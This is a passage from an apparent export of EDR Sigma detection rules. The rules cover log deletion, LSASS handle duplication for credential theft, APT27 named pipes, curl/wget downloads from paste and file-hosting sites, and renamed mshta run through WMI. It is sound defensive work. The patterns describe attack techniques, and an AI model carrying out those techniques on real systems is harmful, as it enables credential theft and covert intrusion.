-mtime '\n - ' -exec '\n\n condition: selection_bin and selection_files and (selection_command or (selection_directory and not filter_slash)) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "249d762f-c5a2-406d-acf3-071a10d93210", "rule_name": "System Logs Removed via Command-line", "rule_description": "Detects an attempt to remove any of the system's logs.\nAttackers can try to remove the system's logs to hide their tracks.\nIt is recommended to investigate responsible for this action and to look for other malicious actions stemming from it.\n", "rule_creation_date": "2023-01-03", "rule_modified_date": "2026-03-10", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1070.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "24c0c873-a33d-4075-bcfe-ed95f209f435", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.085199Z", "creation_date": "2026-03-23T11:45:34.085201Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.085206Z", "rule_level": "critical", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://rastamouse.me/dumping-lsass-with-duplicated-handles/", "https://github.com/fortra/nanodump?tab=readme-ov-file#handle-duplication" ], "name": "t1003_001_lsass_handle_duplicated.yml", "content": "title: Lsass Handle with VM Read Granted Access Duplicated\nid: 24c0c873-a33d-4075-bcfe-ed95f209f435\ndescription: |\n Detects LSASS handle duplication with PROCESS_VM_READ access rights targeting credential extraction.\n The Local Security Authority Subsystem Service (LSASS) is a critical Windows process that handles authentication. Threat actors frequently target LSASS to extract credentials stored in memory.\n Handle duplication is a technique where attackers duplicate an existing handle to LSASS rather than directly opening a new handle, which can be more evasive against security solutions. Tools like Nanodump leverage this approach to dump LSASS memory while avoiding detection by antivirus and endpoint detection and response (EDR) systems.\n It is recommended to investigate the parent process and command line arguments of the process performing the handle duplication, check for additional suspicious activities in the process tree, and validate whether the process has legitimate reasons to access LSASS memory.\nreferences:\n - https://rastamouse.me/dumping-lsass-with-duplicated-handles/\n - https://github.com/fortra/nanodump?tab=readme-ov-file#handle-duplication\ndate: 2025/04/29\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessDuplicateHandle\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: process_duplicate_handle\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: 'PROCESS_VM_READ'\n AgentVersion|gte|version: 4.9.0\n\n exclusion_csrss:\n CallerImage:\n - '?:\\Windows\\System32\\csrss.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\csrss.exe'\n - '\\Device\\VhdHardDisk*\\Windows\\System32\\csrss.exe'\n CallerIsDestination: true\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_hp:\n CallerImage: '?:\\Program Files\\HP\\Sure Click\\bin\\Br-init-o.exe'\n ProcessSignature|contains: 'Bromium'\n ProcessSigned: 'true'\n\n exclusion_kaspersky:\n CallerImage|startswith: '?:\\Program Files (x86)\\Kaspersky Lab\\'\n ProcessSignature|contains: 'Kaspersky Lab'\n ProcessSigned: 'true'\n\n exclusion_nable:\n CallerImage|startswith: '?:\\Program Files (x86)\\N-able Technologies\\'\n ProcessSignature:\n - 'N-ABLE TECHNOLOGIES LTD'\n - 'Solarwinds Worldwide, LLC'\n ProcessSigned: 'true'\n\n exclusion_werfault:\n CallerImage|startswith:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFaultSecure.exe'\n - '?:\\Windows\\SysWOW64\\WerFaultSecure.exe'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_werfault_commandline:\n ProcessCommandLine: '?:\\windows\\System32\\svchost.exe -k WerSvcGroup'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_windows_task_tools:\n CallerImage:\n - '?:\\Windows\\System32\\tasklist.exe'\n - '?:\\Windows\\System32\\taskkill.exe'\n - '?:\\Windows\\System32\\Taskmgr.exe.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_sentinelone:\n CallerImage|startswith: '?:\\Program Files\\SentinelOne\\'\n ProcessSignature: 'Sentinelone, Inc.'\n ProcessSigned: 'true'\n\n exclusion_perfmon:\n CallerImage: '?:\\Windows\\System32\\perfmon.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_windows_cluster_binaries:\n ProcessOriginalFileName:\n - 'rhs.exe'\n - 'clussvc.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_checkpoint:\n CallerImage|startswith: '?:\\Program Files (x86)\\CheckPoint\\'\n ProcessSignature: 'Check Point Software Technologies Ltd.'\n ProcessSigned: 'true'\n\n exclusion_dnspy:\n ProcessSha256:\n - '6674538f0c1bfb2b02921aebea81654dd196efbfe520c1c34d4872908a205a9d'\n - 'bc1c4e0fc49c138bbfc223d3e94231cd4884439c663646d91e48fa005df6704a'\n\n exclusion_pythonservice:\n ProcessSha256: '29a187322c91af564eb259b6b2834d0530d9c7bf0f7c7e42a1c911679cdb745e'\n\n # Covered by another specific rule\n exclusion_procdump:\n ProcessOriginalFileName:\n - 'procdump.exe'\n - 'procdump'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n # Covered by another specific rule\n exclusion_rdrleakdiag:\n CallerImage: '?:\\Windows\\System32\\rdrleakdiag.exe'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n # This is handled by the rule 78397a73-7ba5-4e02-8847-6a3242d29f28\n exclusion_taskmgr:\n CallerImage: '?:\\Windows\\System32\\Taskmgr.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_sccm:\n CallerImage: '?:\\Windows\\CCM\\CcmExec.exe'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_adobe:\n ProcessOriginalFileName: 'Creative Cloud.exe'\n ProcessSignature: 'Adobe Inc.'\n ProcessSigned: 'true'\n\n exclusion_elastic:\n CallerImage: '?:\\Program Files\\Elastic\\Endpoint\\elastic-endpoint.exe'\n ProcessSignature: 'Elasticsearch, Inc.'\n ProcessSigned: 'true'\n\n exclusion_internet_explorer:\n CallerImage: '?:\\Program Files\\Internet Explorer\\iexplore.exe'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_alibaba:\n CallerImage|startswith: '?:\\Program Files (x86)\\AlibabaProtect\\'\n ProcessSignature: 'ALIBABA (CHINA) NETWORK TECHNOLOGY CO.,LTD.'\n ProcessSigned: 'true'\n\n exclusion_mcafee:\n CallerImage|startswith: '?:\\Program Files\\McAfee\\'\n ProcessSignature|contains: 'McAfee, Inc.'\n ProcessSigned: 'true'\n\n exclusion_fsecure:\n CallerImage|startswith: '?:\\Program Files (x86)\\F-Secure\\'\n ProcessSignature|contains: 'WithSecure Oyj'\n ProcessSigned: 'true'\n\n exclusion_lsass:\n CallerImage|startswith: '?:\\Windows\\system32\\lsass.exe'\n ProcessSigned: 'true'\n\n exclusion_wsmprovhost_to_itself:\n CallerImage: '?:\\Windows\\System32\\wsmprovhost.exe'\n SourceImage: '?:\\Windows\\System32\\wsmprovhost.exe'\n\n exclusion_powershell_to_itself:\n - CallerImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n SourceImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - CallerImage: '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n SourceImage: '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n\n exclusion_powertoys:\n ProcessOriginalFileName: 'PowerToys.FileLocksmithUI.dll'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_fileassassin:\n ProcessOriginalFileName: 'FileASSASSIN.exe'\n ProcessCompany: 'Malwarebytes'\n\n exclusion_setup:\n ProcessOriginalFileName: 'SetupHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_symantec:\n CallerImage: '?:\\Program Files (x86)\\Common Files\\Symantec Shared\\COH\\COH64.exe'\n ProcessSignature: 'Symantec Corporation'\n ProcessSigned: 'true'\n\n exclusion_jetbrains:\n ProcessOriginalFileName: 'JetBrains.ReSharperUltimate.LightInstaller'\n ProcessSignature: 'JetBrains s.r.o.'\n ProcessSigned: 'true'\n\n exclusion_system_informer:\n ProcessOriginalFileName: 'System Informer.exe'\n ProcessSignature: 'Winsider Seminars & Solutions Inc.'\n ProcessSigned: 'true'\n\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "24c0c873-a33d-4075-bcfe-ed95f209f435", "rule_name": "Lsass Handle with VM Read Granted Access Duplicated", "rule_description": "Detects LSASS handle duplication with PROCESS_VM_READ access rights targeting credential extraction.\nThe Local Security Authority Subsystem Service (LSASS) is a critical Windows process that handles authentication. Threat actors frequently target LSASS to extract credentials stored in memory.\nHandle duplication is a technique where attackers duplicate an existing handle to LSASS rather than directly opening a new handle, which can be more evasive against security solutions. Tools like Nanodump leverage this approach to dump LSASS memory while avoiding detection by antivirus and endpoint detection and response (EDR) systems.\nIt is recommended to investigate the parent process and command line arguments of the process performing the handle duplication, check for additional suspicious activities in the process tree, and validate whether the process has legitimate reasons to access LSASS memory.\n", "rule_creation_date": "2025-04-29", "rule_modified_date": "2026-02-23", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access" ], "rule_technique_tags": [ "attack.t1003.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "24ca43a5-7027-4676-8c7f-991dff78cc7c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.607956Z", "creation_date": "2026-03-23T11:45:34.607971Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.607979Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.intrinsec.com/apt27-analysis/", "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html", "https://attack.mitre.org/techniques/T1106/" ], "name": "t1106_apt27_named_pipe_creation.yml", "content": "title: Suspicious APT27 Related Named Pipe Created\nid: 24ca43a5-7027-4676-8c7f-991dff78cc7c\ndescription: |\n Detects the creation or connection of/to a Named Pipe named \"testPipe\".\n The name is related to the APT27 threat, more specifically their HyperBro malware.\n It is recommended to verify that this is a legitimate developer pipe.\nreferences:\n - https://www.intrinsec.com/apt27-analysis/\n - https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html\n - https://attack.mitre.org/techniques/T1106/\ndate: 2022/10/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.ThreatActor.APT27\n - classification.Windows.Malware.HyperBro\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName: '\\testPipe'\n\n exclusion_hellodoc:\n ProcessImage|endswith:\n - '\\IMAGINE Editions\\HelloDoc\\HelloDoc.exe'\n - '\\imagine editions\\hellodoc\\HelloDoc Acces Vidal.exe'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of exclusion_*\nfalsepositives:\n - Legitimate developer creation of a named pipe called \"testPipe\"\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "24ca43a5-7027-4676-8c7f-991dff78cc7c", "rule_name": "Suspicious APT27 Related Named Pipe Created", "rule_description": "Detects the creation or connection of/to a Named Pipe named \"testPipe\".\nThe name is related to the APT27 threat, more specifically their HyperBro malware.\nIt is recommended to verify that this is a legitimate developer pipe.\n", "rule_creation_date": "2022-10-26", "rule_modified_date": "2025-04-14", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1106", "attack.t1559" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "250b3fce-b831-41da-8d48-7ece2c3de1e0", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 1, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.599825Z", "creation_date": "2026-03-23T11:45:34.599829Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.599836Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1105/", "https://attack.mitre.org/techniques/T1071/001/" ], "name": "t1105_curl_suspicious_link_linux.yml", "content": "title: File Downloaded via curl or wget from Suspicious URL (Linux)\nid: 250b3fce-b831-41da-8d48-7ece2c3de1e0\ndescription: |\n Detects the usage of curl or wget to download a file from public hosting services that may contain a malicious payload.\n This technique is used by attackers to download payloads that are hosted on public websites.\n It is recommended to perform an analysis of the downloaded file to check if the content is malicious.\nreferences:\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/01/27\nmodified: 2025/10/28\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Curl\n - classification.Linux.Behavior.FileDownload\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/wget'\n - '/wget2' # https://discussion.fedoraproject.org/t/f40-change-proposal-wget2-as-wget/96422\n - '/curl'\n CommandLine|contains:\n - 'cdn.discordapp.com'\n - 'api.telegram.org'\n - 'www.dropbox.com'\n - 'api.dropboxapi.com'\n - 'content.dropboxapi.com'\n - 'transfer.sh'\n - 'anonfiles.com'\n - 'gofile.io'\n - 'file.io'\n - 'raw.githubusercontent.com'\n - 'gist.githubusercontent.com'\n - 'pastebin.com'\n - 'mediafire.com'\n - 'mega.nz'\n - 'ddns.net'\n - '.paste.ee'\n - '.hastebin.com'\n - '.ghostbin.co/'\n - 'ufile.io'\n - 'storage.googleapis.com'\n - 'send.exploit.in'\n - 'privatlab.net'\n - 'privatlab.com'\n - 'sendspace.com'\n - 'pastetext.net'\n - 'pastebin.pl'\n - 'paste.ee'\n - 'pastie.org'\n - 'artchive.org'\n - 'paste.c-net.org'\n\n # https://github.com/gianlucaborello/libprocesshider/archive/refs/heads/master.zip\n # https://github.com/gianlucaborello/libprocesshider/archive/25e0587d6bf2137f8792dc83242b6b0e5a72b415.zip\n - 'https://github.com/*/archive/*.zip'\n\n exclusion_legitimate_url:\n CommandLine|contains:\n - ' https://raw.githubusercontent.com/Orange-Cyberdefense/*IOC'\n - ' https://raw.githubusercontent.com/google/'\n - ' https://raw.githubusercontent.com/Homebrew/'\n - ' https://raw.githubusercontent.com/wp-cli/'\n - ' https://raw.githubusercontent.com/nextcloud/'\n - ' https://raw.githubusercontent.com/laurent22/joplin/'\n - ' https://raw.githubusercontent.com/ohmyzsh/'\n - ' https://raw.githubusercontent.com/nvm-sh/'\n - ' https://raw.githubusercontent.com/docker-library/'\n - ' https://raw.githubusercontent.com/anchore/'\n - ' https://storage.googleapis.com/git-repo-downloads/'\n - ' https://github.com/scylladb/'\n - ' https://raw.githubusercontent.com/microsoft/'\n - ' https://raw.githubusercontent.com/community-scripts/ProxmoxVE/'\n - ' https://raw.githubusercontent.com/helm/'\n - ' https://raw.githubusercontent.com/pyenv/'\n - ' https://raw.githubusercontent.com/onyx-dot-app/'\n\n exclusion_commandline:\n CommandLine|contains: 'curl -vvv --max-time 0 --proxy * --proxy-user * -H Authorization: Bearer '\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_netdata:\n - CommandLine|contains:\n - ' https://raw.githubusercontent.com/netdata/netdata/master/packaging/installer/'\n - ' https://storage.googleapis.com/netdata-nightlies/'\n - ParentCommandLine: 'bash /etc/cron.daily/netdata-updater'\n\n exclusion_clamav:\n ParentCommandLine: '/usr/bin/bash /usr/local/sbin/clamav-unofficial-sigs.sh'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "250b3fce-b831-41da-8d48-7ece2c3de1e0", "rule_name": "File Downloaded via curl or wget from Suspicious URL (Linux)", "rule_description": "Detects the usage of curl or wget to download a file from public hosting services that may contain a malicious payload.\nThis technique is used by attackers to download payloads that are hosted on public websites.\nIt is recommended to perform an analysis of the downloaded file to check if the content is malicious.\n", "rule_creation_date": "2023-01-27", "rule_modified_date": "2025-10-28", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control" ], "rule_technique_tags": [ "attack.t1071.001", "attack.t1105" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "252c798b-019c-4d67-848f-3b675cd5c18f", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.613378Z", "creation_date": "2026-03-23T11:45:34.613381Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.613389Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/mzet-/linux-exploit-suggester/", "https://attack.mitre.org/techniques/T1595/002/" ], "name": "t1595_002_linux_exp_suggester_bash.yml", "content": "title: Linux-Exploit-Suggester Hacktool Executed via Bash\nid: 252c798b-019c-4d67-848f-3b675cd5c18f\ndescription: |\n Detects the execution of linux-exploit-suggester, an open-source shell script for suggesting privilege escalation exploits on Linux.\n Adversaries may use this script to identify a way to elevate their privileges.\n It is recommended to check for other suspicious activities by the process' parent.\nreferences:\n - https://github.com/mzet-/linux-exploit-suggester/\n - https://attack.mitre.org/techniques/T1595/002/\ndate: 2022/11/21\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.t1595.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.Bash\n - classification.Linux.HackTool.LinuxExploitSuggester\n - classification.Linux.Behavior.Discovery\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_script:\n CommandLine|contains: 'linux-exploit-suggester.sh'\n filter_script:\n ParentCommandLine|contains: 'linux-exploit-suggester.sh'\n\n selection_cmd:\n CommandLine:\n - \"grep -E -i ^networkmanager-vpnc|network-manager-vpnc-[0-9]+\"\n - \"grep -E -i ^polkit|policykit-1-[0-9]+\"\n\n condition: (selection_script and not filter_script) or selection_cmd\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "252c798b-019c-4d67-848f-3b675cd5c18f", "rule_name": "Linux-Exploit-Suggester Hacktool Executed via Bash", "rule_description": "Detects the execution of linux-exploit-suggester, an open-source shell script for suggesting privilege escalation exploits on Linux.\nAdversaries may use this script to identify a way to elevate their privileges.\nIt is recommended to check for other suspicious activities by the process' parent.\n", "rule_creation_date": "2022-11-21", "rule_modified_date": "2025-04-14", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [], "rule_technique_tags": [ "attack.t1595.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "254f2253-5e75-41de-a4fb-bbfa86c1a831", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.604309Z", "creation_date": "2026-03-23T11:45:34.604312Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.604320Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://unit42.paloaltonetworks.com/valak-evolution/", "https://twitter.com/ForensicITGuy/status/1334734244120309760", "https://app.any.run/tasks/6e90f38e-8b34-4e12-9a33-3bc5e3b4d81e/" ], "name": "t1047_group_ta551_wmi_renamed_mshta.yml", "content": "title: Possible Lateral Movement via Renamed MSHTA through WMI\nid: 254f2253-5e75-41de-a4fb-bbfa86c1a831\ndescription: |\n Detects when a renamed mshta.exe binary is executed by WMI (child of wmiprvse).\n This technique is heavily used by the TA551 group actor when executing a malicious payload received by spear phishing campaigns.\n It is recommended to investigate the origin of this execution through the authentication telemetry and to analyze child processes to look for malicious content or actions.\nreferences:\n - https://unit42.paloaltonetworks.com/valak-evolution/\n - https://twitter.com/ForensicITGuy/status/1334734244120309760\n - https://app.any.run/tasks/6e90f38e-8b34-4e12-9a33-3bc5e3b4d81e/\ndate: 2020/12/08\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mshta\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\wmiprvse.exe'\n OriginalFileName: 'MSHTA.EXE'\n\n filter_image:\n Image|endswith: '\\mshta.exe'\n\n condition: selection and not 1 of filter_*\nlevel: critical\n# level: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "254f2253-5e75-41de-a4fb-bbfa86c1a831", "rule_name": "Possible Lateral Movement via Renamed MSHTA through WMI", "rule_description": "Detects when a renamed mshta.exe binary is executed by WMI (child of wmiprvse).\nThis technique is heavily used by the TA551 group actor when executing a malicious payload received by spear phishing campaigns.\nIt is recommended to investigate the origin of this execution through the authentication telemetry and to analyze child processes to look for malicious content or actions.\n", "rule_creation_date": "2020-12-08", "rule_modified_date": "2025-03-06", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1047" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2557816c-987b-4020-8958-02526e2e549b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.096803Z", "creation_date": "2026-03-23T11:45:34.096805Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.096809Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.gdatasoftware.com/blog/2025/06/38218-connectwise-abuse-malware", "https://x.com/smica83/status/1977489233712717894", "https://attack.mitre.org/techniques/T1553/002/" ], "name": "t1553_002_connectwise_revoked_certificate.yml", "content": "title: Process Executed Signed with Connectwise Revoked Certificate\nid: 2557816c-987b-4020-8958-02526e2e549b\ndescription: |\n Detects the execution of a process signed using the Connectwise revoked certificate.\n This certificate has been revoked because it was abused by threat actors to sign malicious ConnectWise binaries.\n Since March 2025, threat actors have been abusing validly signed ConnectWise binaries by embedding custom malicious content via Authenticode stuffing without breaking the signature.\n It is recommended to investigate the process to determine its legitimacy.\nreferences:\n - https://www.gdatasoftware.com/blog/2025/06/38218-connectwise-abuse-malware\n - https://x.com/smica83/status/1977489233712717894\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2025/10/13\nmodified: 2025/10/22\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint: '4c2272fba7a7380f55e2a424e9e624aee1c14579'\n\n # Using Connectwise revoked certificate but not malicious\n exclusion_image:\n ProcessImage:\n - '?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.ClientService.exe'\n - '?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsClient.exe'\n - '?:\\Program Files (x86)\\ScreenConnect\\Bin\\ScreenConnect.Service.exe'\n - '?:\\Windows\\LTSvc\\LTSVC.exe'\n - '?:\\Windows\\LTSvc\\LTTray.exe'\n - '?:\\Windows\\LTSvc\\LTSvcMon.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Apps\\\\*\\\\????????.???\\\\????????.???\\\\*\\ScreenConnect.ClientService.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Apps\\\\*\\\\????????.???\\\\????????.???\\\\*\\ScreenConnect.WindowsClient.exe'\n - '?:\\Program Files (x86)\\SAAZOD\\\\*'\n - '?:\\Program Files (x86)\\ITSPlatform\\\\*'\n - '*\\STAGO\\Stago.Psad.Client\\ScreenConnect\\ScreenConnect.ClientService.exe'\n - '*\\STAGO\\Stago.Psad.Client\\ScreenConnect\\ScreenConnect.WindowsClient.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2557816c-987b-4020-8958-02526e2e549b", "rule_name": "Process Executed Signed with Connectwise Revoked Certificate", "rule_description": "Detects the execution of a process signed using the Connectwise revoked certificate.\nThis certificate has been revoked because it was abused by threat actors to sign malicious ConnectWise binaries.\nSince March 2025, threat actors have been abusing validly signed ConnectWise binaries by embedding custom malicious content via Authenticode stuffing without breaking the signature.\nIt is recommended to 